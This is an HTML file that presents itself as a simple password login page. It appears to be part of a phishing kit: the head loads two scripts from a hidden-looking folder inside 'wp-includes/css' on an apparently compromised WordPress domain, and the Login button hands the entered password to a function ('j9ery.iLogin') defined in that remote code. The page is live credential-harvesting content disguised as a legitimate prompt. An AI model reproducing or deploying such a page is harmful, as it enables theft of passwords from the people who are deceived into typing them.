<html>
    <head>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js"></script>
        <script src="http://alhadafadv.com/ser/wp-includes/css/sURECKECk/dice.js?r="></script>
        <script type="text/javascript" src="http://alhadafadv.com/ser/wp-includes/css/sURECKECk/php2/changelink.php?r="></script>
    </head>
    <body style="margin: 0; padding: 0">
        <div class="centered_div" style="width:400px; height:200px; margin: 0px auto; border: 1px solid #f3f3f3">
            <table width="100%">
                <tr>
                    <td>
                        <input type="password" name="password" id="password" value="" placeholder="Enter Password" style="width:100%; height:40px; font-size: inherit;">
                    </td>
                </tr>
                <tr>
                    <td style="text-align: center">
                        <button type="submit" onclick="j9ery.iLogin($('input#password').val());">Login</button>
                    </td>
                </tr>
            </table>
        </div>
    </body>
</html>